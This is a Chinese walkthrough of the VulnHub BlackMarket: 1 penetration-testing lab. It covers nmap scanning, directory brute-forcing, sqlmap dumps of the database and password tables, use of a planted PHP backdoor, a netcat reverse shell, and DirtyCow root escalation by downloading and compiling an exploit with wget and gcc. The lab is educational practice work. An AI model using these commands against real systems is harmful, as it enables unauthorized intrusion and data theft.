当前位置: 首页 > news >正文

BlackMarket_ 1靶机渗透

在这里插入图片描述

项目地址

```plain https://download.vulnhub.com/blackmarket/BlackMarket.zip ```

实验过程

开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/169d964d61ea9660c1104e723f71449e.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知BlackMarket: 1的一个ip地址为192.168.47.174

扫描BlackMarket: 1的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.174 ```

发现该靶机开放了21,22,80,110,143,993,995端口

信息收集

浏览器访问80端口,发现是一个登录页面

查看源码发现了第一个flag

base64解码后获得flag

flag1{CIA - Operation Treadstone}

目录扫描

dirb http://192.168.47.174

拼接/squirrelmail/

得到一个登录界面

拼接/supplier/,这个目录会302重定向到Web登录界面

尝试使用目录名字supplier supplier登录,发现登录成功

登陆成功

编辑AK74U时抓包,再使用sqlmap检测是否存在SQL注入,发现存在SQL注入

sqlmap -r sql.txt --dbs --batch
sqlmap -r sql.txt -D BlackMarket --tables --batch
sqlmap -r sql.txt -D BlackMarket -T flag --columns --batch
sqlmap -r sql.txt -D BlackMarket -T flag -C name,FlagId,Information --dump --batch

得到第三个flag

flag3{Find Jason Bourne Email access}

获取user表中的字段

sqlmap -r sql.txt -D BlackMarket -T user --columns --batch
sqlmap -r sql.txt -D BlackMarket -T user -C access,password,username,userid --dump --batch

对各用户密码进行解密:

admin   BigBossCIA
user    user
jbourne 解密失败
bladen  解密失败

使用admin账户登录得到第四个flag

base64解码

flag4{nothing is here} 

发现了Jason Bourne 的电子邮件:jbourne@cia.gov

回到小松鼠登录界面

根据flag4的弹窗猜测密码是???

使用账号密码jbourne ???进行登录

登陆成功

点击INBOX.Trash——>IMPORTANT MESSAGE,发现了第五个flag

base64解码

flag5{Everything is encrypted}

此外,还有一段密文:

Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl
KzhhKzhh.qkt rm liwvi gl szxp rm rg.

看着像置换密码,找个在线网站解密quipqiup - cryptoquip and cryptogram solver:

Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to PassPass.jpg in order to hack in it.

这段话告诉我们/kgbbackdoor目录下留了一个后门,后门是一张叫PassPass.jpg的图片

从数据库着手,发现有一个eworkshop的数据库,利用crunch生成字典进行爆破:

crunch 9 9 -t @workshop > shop.txt
dirb http://192.168.47.174 shop.txt

拼接/vworkshop/kgbbackdoor/PassPass.jpg

将图片保存到本地进行查看

cat PassPass.jpg

得到一个密码5215565757312090656,解密为:HailKGD

先将5215565757312090656转为16进制4861696c4b474400再转为字符串

存在backdoor.php文件,拼接再url后面

http://192.168.47.174/vworkshop/kgbbackdoor/backdoor.php

查看源码

发现有input

添加一个submit

在框内随便输入,回车提交

使用Burp抓包,用POST传pass=HailKGB

放包

成功进入

点击flag.txt得到第六个flag

base64解码

flag6{Root time}

获取shell

kali设置监听
nc -lvvp 7272

反弹成功

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

查看系统内核
uname -a

发现这个版本可以利用CVE-2016-5195脏牛提权

searchsploit dirt

将exp复制到kali上面来,并开启一个http服务

cp /usr/share/exploitdb/exploits/linux/local/40616.c .
python3 -m http.server

靶机先进入tmp目录然后将exp从kali下载过去

cd /tmp
wget http://192.168.47.129:8000/40616.c
gcc 40616.c -o root -pthread

执行root

./root

提权成功
好小子,离成功又近一步!!!


http://www.mrgr.cn/news/48276.html

相关文章:

  • nodejs:nodejs的技巧有哪些
  • FLV视频封装格式详解
  • idea创建springBoot的五种方式
  • java全栈day20--Web后端实战(Mybatis基础2)
  • STM32 水质水位检测项目(硬件架构)及(软件架构)
  • 内网穿透玩法之京东云亚瑟路由器刷神卓互联教程
  • 5.1串口DMA与接收不定长数据
  • 港股\美股\A股实时行情接入示例,WebSocket协议推送
  • C++常用库函数
  • 学习之高阶编程的内置函数
  • Python和C++及MATLAB低温磁态机器学习模型
  • JavaEE: 深入解析HTTP协议的奥秘(3)
  • 设计模式——工厂方法模式(2)抽象工厂模式(3)
  • 前端面试题“请说说你对 TS 中装饰器的理解“
  • 《标题的力量:在计算机科学中的多元应用》
  • Python从入门到高手6.2节-字符串操作符详解
  • 前端_003_js扫盲
  • 同步和异步的区别
  • 最大二进制奇数 。
  • 定位、地图建立及管理合集
  • 初级学习:Python实现AI并搭建
  • 低代码工单管理app评测,功能与效率解析
  • python各版本新特性简单梳理
  • 如何使用bpmn-js实现可视化流程管理
  • react理念(二)
  • (29)数字信号处理中正弦波的表示